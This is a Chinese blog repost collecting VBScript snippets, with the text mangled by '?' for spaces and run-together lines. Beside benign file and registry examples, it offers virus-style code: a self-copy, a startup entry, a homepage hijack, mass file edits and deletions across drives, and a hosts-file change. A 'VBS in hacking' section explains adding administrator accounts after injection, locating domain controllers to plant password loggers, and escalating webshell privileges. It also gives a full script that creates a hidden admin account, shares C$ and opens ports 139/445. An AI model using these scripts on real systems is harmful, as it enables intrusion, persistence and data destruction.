VBS脚本常用经典代码收集
在網(wǎng)上查找資料的時(shí)候發(fā)現(xiàn)好多經(jīng)典的vbs代碼,收集起來(lái)也為了以后學(xué)習(xí)。
VBS腳本用途很多:
1. 計(jì)算
2. 處理文件和文件夾
3. 管理Windows
4. 處理Word, Excel, PowerPoint等Office文檔
5. 嵌入網(wǎng)頁(yè),驅(qū)動(dòng)dHTML
6. 編寫(xiě)HTTP通信
7. 調(diào)用系統(tǒng)功能(COM組件),比如說(shuō)語(yǔ)音說(shuō)話
8. 分析HTML, XML
9. 調(diào)用命令行并分析返回結(jié)果
10. 處理圖片
11. 自動(dòng)化按鍵
12. 調(diào)用Windows Media Player并管理
13. 調(diào)用Windows Live Messenger并管理
14. 服務(wù)端技術(shù):Active Server Page (ASP)
15. 腳本病毒
16. 處理數(shù)據(jù)庫(kù)
下面是我收集的VBS代碼,大部分轉(zhuǎn)自gangzi.org,以后還會(huì)更新。
VBS獲取系統(tǒng)安裝路徑
先定義這個(gè)變量是獲取系統(tǒng)安裝路徑的,然后我們用”&strWinDir&”調(diào)用這個(gè)變量。
set?WshShell?=?WScript.CreateObject("WScript.Shell") strWinDir?=?WshShell.ExpandEnvironmentStrings("%WinDir%")VBS獲取C:\Program Files路徑
msgbox?CreateObject("WScript.Shell").ExpandEnvironmentStrings("%ProgramFiles%")VBS獲取C:\Program Files\Common Files路徑
msgbox?CreateObject("WScript.Shell").ExpandEnvironmentStrings("%CommonProgramFiles%")給桌面添加網(wǎng)址快捷方式
set?gangzi?=?WScript.CreateObject("WScript.Shell") strDesktop?=?gangzi.SpecialFolders("Desktop") set?oShellLink?=?gangzi.CreateShortcut(strDesktop?&?"\Internet?Explorer.lnk") oShellLink.TargetPath?=?"http://www.fendou.info" oShellLink.Description?=?"Internet?Explorer" oShellLink.IconLocation?=?"%ProgramFiles%\Internet?Explorer\iexplore.exe,?0" oShellLink.Save給收藏夾添加網(wǎng)址
Const?ADMINISTRATIVE_TOOLS?=?6Set?objShell?=?CreateObject("Shell.Application") Set?objFolder?=?objShell.Namespace(ADMINISTRATIVE_TOOLS) Set?objFolderItem?=?objFolder.Self????Set?objShell?=?WScript.CreateObject("WScript.Shell") strDesktopFld?=?objFolderItem.Path Set?objURLShortcut?=?objShell.CreateShortcut(strDesktopFld?&?"\奮斗Blog.url") objURLShortcut.TargetPath?=?"http://www.fendou.info/" objURLShortcut.Save刪除指定目錄指定后綴文件
On?Error?Resume?Next Set?fso?=?CreateObject("Scripting.FileSystemObject") fso.DeleteFile?"C:\*.vbs",?True Set?fso?=?NothingVBS改主頁(yè)
Set?oShell?=?CreateObject("WScript.Shell") oShell.RegWrite?"HKEY_CURRENT_USER\Software\Microsoft\Internet?Explorer\Main\Start?Page","http://www.fendou.info"VBS加啟動(dòng)項(xiàng)
Set?oShell=CreateObject("Wscript.Shell") oShell.RegWrite?"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\cmd","cmd.exe"VBS復(fù)制自己
set?copy1=createobject("scripting.filesystemobject") copy1.getfile(wscript.scriptfullname).copy("c:\huan.vbs")復(fù)制自己到C盤(pán)的huan.vbs(復(fù)制本vbs目錄下的game.exe文件到c盤(pán)的gangzi.exe)
set?copy1=createobject("scripting.filesystemobject") copy1.getfile("game.exe").copy("c:\gangzi.exe")VBS獲取系統(tǒng)臨時(shí)目錄
Dim?fso Set?fso?=?CreateObject("Scripting.FileSystemObject") Dim?tempfolder Const?TemporaryFolder?=?2 Set?tempfolder?=?fso.GetSpecialFolder(TemporaryFolder) Wscript.Echo?tempfolder就算代碼出錯(cuò) 依然繼續(xù)執(zhí)行
On?Error?Resume?NextVBS打開(kāi)網(wǎng)址
Set?objShell?=?CreateObject("Wscript.Shell") objShell.Run("http://www.fendou.info/")VBS發(fā)送郵件
NameSpace?=?"http://schemas.microsoft.com/cdo/configuration/" Set?Email?=?CreateObject("CDO.Message") Email.From?=?"發(fā)件@qq.com" Email.To?=?"收件@qq.com" Email.Subject?=?"Test?sendmail.vbs" Email.Textbody?=?"OK!" Email.AddAttachment?"C:\1.txt" With?Email.Configuration.Fields .Item(NameSpace&"sendusing")?=?2 .Item(NameSpace&"smtpserver")?=?"smtp.郵件服務(wù)器.com" .Item(NameSpace&"smtpserverport")?=?25 .Item(NameSpace&"smtpauthenticate")?=?1 .Item(NameSpace&"sendusername")?=?"發(fā)件人用戶名" .Item(NameSpace&"sendpassword")?=?"發(fā)件人密碼" .Update End?With Email.SendVBS結(jié)束進(jìn)程
strComputer?=?"." Set?objWMIService?=?GetObject?_("winmgmts:\\"?&?strComputer?&?"\root\cimv2") Set?colProcessList?=?objWMIService.ExecQuery?_("Select?*?from?Win32_Process?Where?Name?=?'Rar.exe'") For?Each?objProcess?in?colProcessListobjProcess.Terminate() NextVBS隱藏打開(kāi)網(wǎng)址(部分瀏覽器無(wú)法隱藏打開(kāi),而是直接打開(kāi),適合主流用戶使用)
createObject("wscript.shell").run?"iexplore?http://www.fendou.info/",0兼容所有瀏覽器,使用IE的絕對(duì)路徑+參數(shù)打開(kāi),無(wú)法用函數(shù)得到IE安裝路徑,只用函數(shù)得到了Program Files路徑,應(yīng)該比上面的方法好,但是兩種方法都不是絕對(duì)的。
Set?objws=WScript.CreateObject("wscript.shell") objws.Run?"""C:\Program?Files\Internet?Explorer\iexplore.exe""www.baidu.com",vbhideVBS遍歷硬盤(pán)刪除指定文件名
On?Error?Resume?Next Dim?fPath strComputer?=?"." Set?objWMIService?=?GetObject?_("winmgmts:\\"?&?strComputer?&?"\root\cimv2") Set?colProcessList?=?objWMIService.ExecQuery?_("Select?*?from?Win32_Process?Where?Name?=?'gangzi.exe'") For?Each?objProcess?in?colProcessListobjProcess.Terminate() Next Set?objWMIService?=?GetObject("winmgmts:"?_ &?"{impersonationLevel=impersonate}!\\"?&?strComputer?&?"\root\cimv2") Set?colDirs?=?objWMIService.?_ ExecQuery("Select?*?from?Win32_Directory?where?name?LIKE?'%c:%'?or?name?LIKE?'%d:%'?or?name?LIKE?'%e:%'?or?name?LIKE?'%f:%'?or?name?LIKE?'%g:%'?or?name?LIKE?'%h:%'?or?name?LIKE?'%i:%'") Set?objFSO?=?CreateObject("Scripting.FileSystemObject") For?Each?objDir?in?colDirs fPath?=?objDir.Name?&?"\gangzi.exe" objFSO.DeleteFile(fPath),?True NextVBS獲取網(wǎng)卡MAC地址
Dim?mc,mo Set?mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration") For?Each?mo?In?mc If?mo.IPEnabled=True?Then MsgBox?"本機(jī)網(wǎng)卡MAC地址是:?"?&?mo.MacAddress Exit?For End?If NextVBS獲取本機(jī)注冊(cè)表主頁(yè)地址
Set?reg=WScript.CreateObject("WScript.Shell") startpage=reg.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Internet?Explorer\Main\Start?Page") MsgBox?startpageVBS遍歷所有磁盤(pán)的所有目錄,找到所有.txt的文件,然后給所有txt文件最底部加一句話
On?Error?Resume?Next Set?fso?=?CreateObject("Scripting.FileSystemObject") Co?=?VbCrLf?&?"路過(guò)。。。"For?Each?i?In?fso.DrivesIf?i.DriveType?=?2?ThenGF?fso.GetFolder(i?&?"\")End?If NextSub?GF(fol)Wh?folDim?iFor?Each?i?In?fol.SubFoldersGF?iNext End?SubSub?Wh(fol)Dim?iFor?Each?i?In?fol.FilesIf?LCase(fso.GetExtensionName(i))?=?"shtml"?Thenfso.OpenTextFile(i,8,0).Write?CoEnd?IfNext End?Sub獲取計(jì)算機(jī)所有盤(pán)符
Set?fso=CreateObject("scripting.filesystemobject") Set?objdrives=fso.Drives?'取得當(dāng)前計(jì)算機(jī)的所有磁盤(pán)驅(qū)動(dòng)器 For?Each?objdrive?In?objdrives???'遍歷磁盤(pán) MsgBox?objdrive NextVBS給本機(jī)所有磁盤(pán)根目錄創(chuàng)建文件
On?Error?Resume?Next Set?fso=CreateObject("Scripting.FileSystemObject") Set?gangzis=fso.Drives?'取得當(dāng)前計(jì)算機(jī)的所有磁盤(pán)驅(qū)動(dòng)器 For?Each?gangzi?In?gangzis???'遍歷磁盤(pán) Set?TestFile=fso.CreateTextFile(""&gangzi&"\新建文件夾.vbs",Ture) TestFile.WriteLine("By?www.gangzi.org") TestFile.Close NextVBS遍歷本機(jī)全盤(pán)找到所有123.exe,然后給他們改名321.exe
set?fs?=?CreateObject("Scripting.FileSystemObject")for?each?drive?in?fs.drives fstraversal?drive.rootfolder nextsub?fstraversal(byval?this) for?each?folder?in?this.subfolders fstraversal?folder next set?files?=?this.files for?each?file?in?files if?file.name?=?"123.exe"?then?file.name?=?"321.exe" next end?subVBS寫(xiě)入代碼到粘貼板(先說(shuō)明一下,VBS寫(xiě)內(nèi)容到粘貼板,網(wǎng)上千篇一律都是通過(guò)InternetExplorer.Application對(duì)象來(lái)實(shí)現(xiàn),但是缺點(diǎn)是在默認(rèn)瀏覽器為非IE中會(huì)彈出瀏覽器,所以費(fèi)了很大的勁找到了這個(gè)代碼來(lái)實(shí)現(xiàn))
str=“這里是你要復(fù)制到剪貼板的字符串” Set?ws?=?wscript.createobject("wscript.shell") ws.run?"mshta?vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0,trueQQ自動(dòng)發(fā)消息
On?Error?Resume?Next str="我是笨蛋/qq" Set?WshShell=WScript.CreateObject("WScript.Shell") WshShell.run?"mshta?vbscript:clipboardData.SetData("+""""+"text"+""""+","+""""&str&""""+")(close)",0 WshShell.run?"tencent://message/?Menu=yes&uin=20016964&Site=&Service=200&sigT=2a39fb276d15586e1114e71f7af38e195148b0369a16a40fdad564ce185f72e8de86db22c67ec3c1",0,true WScript.Sleep?3000 WshShell.SendKeys?"^v" WshShell.SendKeys?"%s"VBS隱藏文件
Set?objFSO?=?CreateObject("Scripting.FileSystemObject") Set?objFile?=?objFSO.GetFile("F:\軟件大賽\show.txt") If?objFile.Attributes?=?objFile.Attributes?AND?2?ThenobjFile.Attributes?=?objFile.Attributes?XOR?2 End?IfVBS生成隨機(jī)數(shù)(521是生成規(guī)則,不同的數(shù)字生成的規(guī)則不一樣,可以用于其它用途)
Randomize?521 point=Array(Int(100*Rnd+1),Int(1000*Rnd+1),Int(10000*Rnd+1)) msgbox?join(point,"")VBS刪除桌面IE圖標(biāo)(非快捷方式)
Set?oShell?=?CreateObject("WScript.Shell") oShell.RegWrite?"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD"VBS獲取自身文件名
Set?fso?=?CreateObject("Scripting.FileSystemObject") msgbox?WScript.ScriptNameVBS讀取Unicode編碼的文件
Set?objFSO?=?CreateObject("Scripting.FileSystemObject") Set?objFile?=?objFSO.OpenTextFile("gangzi.txt",1,False,-1) strText?=?objFile.ReadAll objFile.Close Wscript.Echo?strTextVBS讀取指定編碼的文件(默認(rèn)為uft-8)gangzi變量是要讀取文件的路徑
set?stm2?=createobject("ADODB.Stream") stm2.Charset?=?"utf-8" stm2.Open stm2.LoadFromFile?gangzi readfile?=?stm2.ReadText MsgBox?readfileVBS禁用組策略
Set?oShell?=?CreateObject("WScript.Shell") oShell.RegWrite?"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins",1,"REG_DWORD"VBS寫(xiě)指定編碼的文件(默認(rèn)為uft-8)gangzi變量是要讀取文件的路徑,gangzi2是內(nèi)容變量
gangzi="1.txt" gangzi2="www.gangzi.org" Set?Stm1?=?CreateObject("ADODB.Stream") Stm1.Type?=?2 Stm1.Open Stm1.Charset?=?"UTF-8" Stm1.Position?=?Stm1.Size Stm1.WriteText?gangzi2 Stm1.SaveToFile?gangzi,2 Stm1.Close set?Stm1?=?nothingVBS獲取當(dāng)前目錄下所有文件夾名字(不包括子文件夾)
Set?fso=CreateObject("scripting.filesystemobject") Set?f=fso.GetFolder(fso.GetAbsolutePathName(".")) Set?folders=f.SubFolders For?Each?fo?In?folderswsh.echo?fo.Name Next Set?folders=Nothing Set?f=nothing Set?fso=nothingVBS獲取指定目錄下所有文件夾名字(包括子文件夾)
Dim?t Set?fso=WScript.CreateObject("scripting.filesystemobject") Set?fs=fso.GetFolder("d:\") WScript.Echo?aa(fs) Function?aa(n) Set?f=n.subfolders For?Each?uu?In?f Set?op=fso.GetFolder(uu.path) t=t?&?vbcrlf?&?op.path Call?aa(op) Next aa=t End?functionVBS創(chuàng)建.URL文件(IconIndex參數(shù)不同的數(shù)字代表不同的圖標(biāo),具體請(qǐng)參照SHELL32.dll里面的所有圖標(biāo))
set?fso=createobject("scripting.filesystemobject") qidong=qidong&"[InternetShortcut]"&Chr(13)&Chr(10) qidong=qidong&"URL=http://www.fendou.info"&Chr(13)&Chr(10) qidong=qidong&"IconFile=C:\WINDOWS\system32\SHELL32.dll"&Chr(13)&Chr(10) qidong=qidong&"IconIndex=130"&Chr(13)&Chr(10) Set?TestFile=fso.CreateTextFile("qq.url",Ture) TestFile.WriteLine(qidong) TestFile.CloseVBS寫(xiě)hosts(沒(méi)寫(xiě)判斷,無(wú)論存不存在都追加底部)
Set?fs?=?CreateObject("Scripting.FileSystemObject") path?=?""&fs.GetSpecialFolder(1)&"\drivers\etc\hosts" Set?f?=?fs.OpenTextFile(path,8,TristateFalse) f.Write?""&vbcrlf&"127.0.0.1?www.g.cn"&vbcrlf&"127.0.0.1?g.cn" f.CloseVBS讀取出HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace 下面所有鍵的名字并循環(huán)輸出
Const?HKLM?=?&H80000002 strPath?=?"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace" Set?oreg?=?GetObject("Winmgmts:\root\default:StdRegProv")oreg.EnumKey?HKLM,strPath,arrFor?Each?x?In?arrWScript.Echo?xNextVBS創(chuàng)建txt文件
Dim?fso,TestFile Set?fso=CreateObject("Scripting.FileSystemObject") Set?TestFile=fso.CreateTextFile("C:\hello.txt",Ture) TestFile.WriteLine("Hello,World!") TestFile.CloseVBS創(chuàng)建文件夾
Dim?fso,fld Set?fso=CreateObject("Scripting.FileSystemObject") Set?fld=fso.CreateFolder("C:\newFolder")VBS判斷文件夾是否存在
Dim?fso,fld Set?fso=CreateObject("Scripting.FileSystemObject") If?(fso.FolderExists("C:\newFolder"))?Then msgbox("Folder?exists.") else set?fld=fso.CreateFolder("C:\newFolder") End?IfVBS使用變量判斷文件夾
Dim?fso,fld drvName="C:\" fldName="newFolder" Set?fso=CreateObject("Scripting.FileSystemObject") If?(fso.FolderExists(drvName&fldName))?Then msgbox("Folder?exists.") else set?fld=fso.CreateFolder(drvName&fldName) End?IfVBS加輸入框
Dim?fso,TestFile,fileName,drvName,fldName drvName=inputbox("Enter?the?drive?to?save?to:","Drive?letter") fldName=inputbox("Enter?the?folder?name:","Folder?name") fileName=inputbox("Enter?the?name?of?the?file:","Filename") Set?fso=CreateObject("Scripting.FileSystemObject")If(fso.FolderExists(drvName&fldName))Then msgbox("Folder?exists") Else Set?fld=fso.CreateFolder(drvName&fldName) End?IfSet?TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True)TestFile.WriteLine("Hello,World!") TestFile.CloseVBS檢查是否有相同文件
Dim?fso,TestFile,fileName,drvName,fldName drvName=inputbox("Enter?the?drive?to?save?to:","Drive?letter") fldName=inputbox("Enter?the?folder?name:","Folder?name") fileName=inputbox("Enter?the?name?of?the?file:","Filename") Set?fso=CreateObject("Scripting.FileSystemObject")If(fso.FolderExists(drvName&fldName))Then msgbox("Folder?exists") Else Set?fld=fso.CreateFolder(drvName&fldName) End?IfIf(fso.FileExists(drvName&fldName&"\"&fileName&".txt"))Then msgbox("File?already?exists.") Else Set?TestFile=fso.CreateTextFile(drvName&fldName&"\"&fileName&".txt",True) TestFile.WriteLine("Hello,World!") TestFile.Close End?IfVBS改寫(xiě)、追加 文件
Dim?fso,openFile Set?fso=CreateObject("Scripting.FileSystemObject") Set?openFile=fso.OpenTextFile("C:\test.txt",2,True)???'1表示只讀,2表示可寫(xiě),8表示追加 openFile.Write?"Hello?World!" openFile.CloseVBS讀取文件 ReadAll 讀取全部
Dim?fso,openFile Set?fso=CreateObject("Scripting.FileSystemObject") Set?openFile=fso.OpenTextFile("C:\test.txt",1,True) MsgBox(openFile.ReadAll)VBS讀取文件 ReadLine 讀取一行
Dim?fso,openFile Set?fso=CreateObject("Scripting.FileSystemObject") Set?openFile=fso.OpenTextFile("C:\test.txt",1,True) MsgBox(openFile.ReadLine()) MsgBox(openFile.ReadLine())???'如果讀取行數(shù)超過(guò)文件的行數(shù),就會(huì)出錯(cuò)VBS讀取文件 Read 讀取n個(gè)字符
Dim?fso,openFile Set?fso=CreateObject("Scripting.FileSystemObject") Set?openFile=fso.OpenTextFile("C:\test.txt",1,True) MsgBox(openFile.Read(2))???'如果超出了字符數(shù),不會(huì)出錯(cuò)。VBS刪除文件
Dim?fso Set?fso=CreateObject("Scripting.FileSystemObject") fso.DeleteFile("C:\test.txt")VBS刪除文件夾
Dim?fso Set?fso=CreateObject("Scripting.FileSystemObject") fso.DeleteFolder("C:\newFolder")?'不管文件夾中有沒(méi)有文件都一并刪除VBS連續(xù)創(chuàng)建文件
Dim?fso,TestFile Set?fso=CreateObject("Scripting.FileSystemObject") For?i=1?To?10 Set?TestFile=fso.CreateTextFile("C:\hello"&i&".txt",Ture) TestFile.WriteLine("Hello,World!") TestFile.Close NextVBS根據(jù)計(jì)算機(jī)名隨機(jī)生成字符串
set?ws=createobject("wscript.shell") set?wenv=ws.environment("process") RDA=wenv("computername") Function?UCharRand(n) For?i=1?to?n Randomize?ASC(MID(RDA,1,1)) temp?=?cint(25*Rnd) temp?=?temp?+65 UCharRand?=?UCharRand?&?chr(temp) Next End?Function msgbox?UCharRand(LEN(RDA))VBS根據(jù)mac生成序列號(hào)
Function?Encode(strPass)Dim?i,?theStr,?strTmpFor?i?=?1?To?Len(strPass)strTmp?=?Asc(Mid(strPass,?i,?1))theStr?=?theStr?&?Abs(strTmp)NextstrPass?=?theStrtheStr?=?""Do?While?Len(strPass)?>?16strPass?=?JoinCutStr(strPass)LoopFor?i?=?1?To?Len(strPass)strTmp?=?CInt(Mid(strPass,?i,?1))strTmp?=?IIf(strTmp?>?6,?Chr(strTmp?+?60),?strTmp)theStr?=?theStr?&?strTmpNextEncode?=?theStr End?FunctionFunction?JoinCutStr(str)Dim?i,?theStrFor?i?=?1?To?Len(str)If?Len(str)?-?i?=?0?Then?Exit?FortheStr?=?theStr?&?Chr(CInt((Asc(Mid(str,?i,?1))?+?Asc(Mid(str,?i?+1,?1)))?/?2))i?=?i?+?1NextJoinCutStr?=?theStr End?FunctionFunction?IIf(var,?val1,?val2)If?var?=?True?ThenIIf?=?val1ElseIIf?=?val2End?If End?FunctionSet?mc=GetObject("Winmgmts:").InstancesOf("Win32_NetworkAdapterConfiguration") For?Each?mo?In?mc If?mo.IPEnabled=True?Then theStr?=?mo.MacAddress Exit?For End?If NextRandomize?Encode(theStr) rdnum=Int(10*Rnd+5)Function?allRand(n)For?i=1?to?nRandomize?Encode(theStr)temp?=?cint(25*Rnd)If?temp?mod?2?=?0?thentemp?=?temp?+?97ElseIf?temp?<?9?thentemp?=?temp?+?48Elsetemp?=?temp?+?65End?IfallRand?=?allRand?&?chr(temp)Next End?Function msgbox?allRand(rdnum)VBS自動(dòng)連接adsl
Dim?Wsh Set?Wsh?=?WScript.CreateObject("WScript.Shell") wsh.run?"Rasdial?連接名字?賬號(hào)?密碼",false,1VBS自動(dòng)斷開(kāi)ADSL
Dim?Wsh Set?Wsh?=?WScript.CreateObject("WScript.Shell") wsh.run?"Rasdial?/DISCONNECT",false,1VBS每隔3秒自動(dòng)更換IP并打開(kāi)網(wǎng)址實(shí)例(值得一提的是,下面這個(gè)代碼中每次打開(kāi)的網(wǎng)址都是引用同一個(gè)IE窗口,也就是每次打開(kāi)的是覆蓋上次打開(kāi)的窗口,如果需要每次打開(kāi)的網(wǎng)址都是新窗口,直接使用run就可以了)
Dim?Wsh Set?Wsh?=?WScript.CreateObject("WScript.Shell") Set?oIE?=?CreateObject("InternetExplorer.Application") for?i=1?to?5 wsh.run?"Rasdial?/DISCONNECT",false,1 wsh.run?"Rasdial?連接名字?賬號(hào)?密碼",false,1 oIE.Navigate?"http://www.ip138.com/?"&i&"" Call?SynchronizeIE oIE.Visible?=?True next Sub?SynchronizeIE On?Error?Resume?Next Do?While(oIE.Busy) WScript.Sleep?3000 Loop End?Sub用VBS來(lái)加管理員帳號(hào)
在注入過(guò)程中明明有了sa帳號(hào),但是由于net.exe和net1.exe被限制,或其它的不明原因,總是加不了管理員帳號(hào)。VBS在活動(dòng)目錄(adsi)部份有一個(gè)winnt對(duì)像,可以用來(lái)管理本地資源,可以用它不依靠cmd等命令來(lái)加一個(gè)管理員,詳細(xì)代碼如下:
這段代碼如果保存為1.vbs,在cmd下運(yùn)行,格式: cscript 1.vbs的話,會(huì)在當(dāng)前系統(tǒng)加一個(gè)名字為lcx,密碼為123456的管理員。當(dāng)然,你可以用記事本來(lái)修改里邊的變量lcx和123456,改成你喜歡的名字和密碼值。
用vbs來(lái)列虛擬主機(jī)的物理目錄
有時(shí)旁注入侵成功一個(gè)站,拿到系統(tǒng)權(quán)限后,面對(duì)上百個(gè)虛擬主機(jī),怎樣才能更快的找到我們目標(biāo)站的物理目錄呢?一個(gè)站一個(gè)站翻看太累,用系統(tǒng)自帶的adsutil.vbs吧又感覺(jué)好像參數(shù)很多,有點(diǎn)無(wú)法下手的感覺(jué),試試我這個(gè)腳本吧,代碼如下:
運(yùn)行cscript 2.vbs后,就會(huì)詳細(xì)列出IIS里的站點(diǎn)ID、描述、及物理目錄,是不是代碼少很多又方便呢?
用VBS快速找到內(nèi)網(wǎng)域的主服務(wù)器
面對(duì)域結(jié)構(gòu)的內(nèi)網(wǎng),可能許多小菜沒(méi)有經(jīng)驗(yàn)如何去滲透。如果你能拿到主域管理員的密碼,整個(gè)內(nèi)網(wǎng)你就可以自由穿行了。主域管理員一般呆在比較重要的機(jī)器上,如果能搞定其中的一臺(tái)或幾臺(tái),放個(gè)密碼記錄器之類,相信總有一天你會(huì)拿到密碼。主域服務(wù)器當(dāng)然是其中最重要一臺(tái)了,如何在成千臺(tái)機(jī)器里判斷出是哪一臺(tái)呢?dos命令像net group “domain admins” /domain可以做為一個(gè)判斷的標(biāo)準(zhǔn),不過(guò)vbs也可以做到的,這仍然屬于adsi部份的內(nèi)容,代碼如下:
只用這兩句代碼就足夠了,運(yùn)行cscript 3.vbs,會(huì)有結(jié)果的。當(dāng)然,無(wú)論是dos命令或vbs,你前提必須要在域用戶的權(quán)限下。好比你得到了一個(gè)域用戶的帳號(hào)密碼,你可以用 psexec.exe -u -p cmd.exe這樣的格式來(lái)得到域用戶的shell,或你的木馬本來(lái)就是與桌面交互的,登陸你木馬shell的又是域用戶,就可以直接運(yùn)行這些命令了。
vbs的在入侵中的作用當(dāng)然不只這些,當(dāng)然用js或其它工具也可以實(shí)現(xiàn)我上述代碼的功能;不過(guò)這個(gè)專欄定下的題目是vbs在hacking中的妙用,所以我們只提vbs。寫(xiě)完vbs這部份我和其它作者會(huì)在以后的專欄繼續(xù)策劃其它的題目,爭(zhēng)取為讀者帶來(lái)好的有用的文章。
WebShell提權(quán)用的VBS代碼
asp木馬一直是搞腳本的朋友喜歡使用的工具之一,但由于它的權(quán)限一般都比較低(一般是IWAM_NAME權(quán)限),所以大家想出了各種方法來(lái)提升它的權(quán)限,比如說(shuō)通過(guò)asp木馬得到mssql數(shù)據(jù)庫(kù)的權(quán)限,或拿到ftp的密碼信息,又或者說(shuō)是替換一個(gè)服務(wù)程序。而我今天要介紹的技巧是利用一個(gè)vbs文件來(lái)提升asp木馬的權(quán)限,代碼如下asp木馬一直是搞腳本的朋友喜歡使用的工具之一,但由于它的權(quán)限一般都比較低(一般是IWAM_NAME權(quán)限),所以大家想出了各種方法來(lái)提升它的權(quán)限,比如說(shuō)通過(guò)asp木馬得到mssql數(shù)據(jù)庫(kù)的權(quán)限,或拿到ftp的密碼信息,又或者說(shuō)是替換一個(gè)服務(wù)程序。而我今天要介紹的技巧是利用一個(gè)vbs文件來(lái)提升asp木馬的權(quán)限,代碼如下:
將其保存為vbs的后綴,再上傳到服務(wù)上,
然后利用asp木馬執(zhí)行這個(gè)vbs文件后。再試試你的asp木馬吧,你會(huì)發(fā)現(xiàn)自己己經(jīng)是system權(quán)限了
VBS開(kāi)啟ipc服務(wù)和相關(guān)設(shè)置
Dim?OperationRegistry Set?OperationRegistry=WScript.CreateObject("WScript.Shell") OperationRegistry.RegWrite?"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0Set?wsh3=wscript.createobject("wscript.shell") wsh3.Run?"net?user?helpassistant?123456",0,false wsh3.Run?"net?user?helpassistant?/active",0,false wsh3.Run?"net?localgroup?administrators?helpassistant?/add",0,falsewsh3.Run?"net?start?Lanmanworkstation?/y",0,false wsh3.Run?"net?start?Lanmanserver?/y",0,false wsh3.Run?"net?start?ipc$",0,True wsh3.Run?"net?share?c$=c:\",0,falsewsh3.Run?"netsh?firewall?set?notifications?disable",0,True wsh3.Run?"netsh?firewall?set?portopening?TCP?139?enable",0,false wsh3.Run?"netsh?firewall?set?portopening?UDP?139?enable",0,false wsh3.Run?"netsh?firewall?set?portopening?TCP?445?enable",0,false wsh3.Run?"netsh?firewall?set?portopening?UDP?445?enable",0,falseVBS時(shí)間判斷代碼
Digital=timehours=Hour(Digital)minutes=Minute(Digital)seconds=Second(Digital)if?(hours<6)?thendn="凌辰了,還沒(méi)睡啊?"end?ifif?(hours>=6)?thendn="早上好!"end?ifif?(hours>12)?thendn="下午好!"end?ifif?(hours>18)?thendn="晚上好!"end?ifif?(hours>22)?thendn="不早了,夜深了,該睡覺(jué)了!"end?ifif?(minutes<=9)?thenminutes="0"?&?minutesend?ifif?(seconds<=9)?thenseconds="0"?&?secondsend?if ctime=hours?&?":"?&?minutes?&?":"?&?seconds?&?"?"?&?dn Msgbox?ctimeVBS注冊(cè)表讀寫(xiě)
Dim?OperationRegistry?,?mynum Set?OperationRegistry=WScript.CreateObject("WScript.Shell") mynum?=?9 mynum?=?OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest") MsgBox("before?forceguest?=?"&mynum)OperationRegistry.RegWrite?"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest",0mynum?=?OperationRegistry.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\forceguest") MsgBox("after?forceguest?=?"&mynum)VBS運(yùn)行后刪除自身代碼
本文轉(zhuǎn)自 bilinyee博客,原文鏈接: ? ?http://blog.51cto.com/ericfu/1760378?? ?如需轉(zhuǎn)載請(qǐng)自行聯(lián)系原作者
總結(jié)
以上是生活随笔為你收集整理的VBS脚本常用经典代码收集的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Oracle创建自增字段方法-ORACL
- 下一篇: form上传文件以及跨域异步上传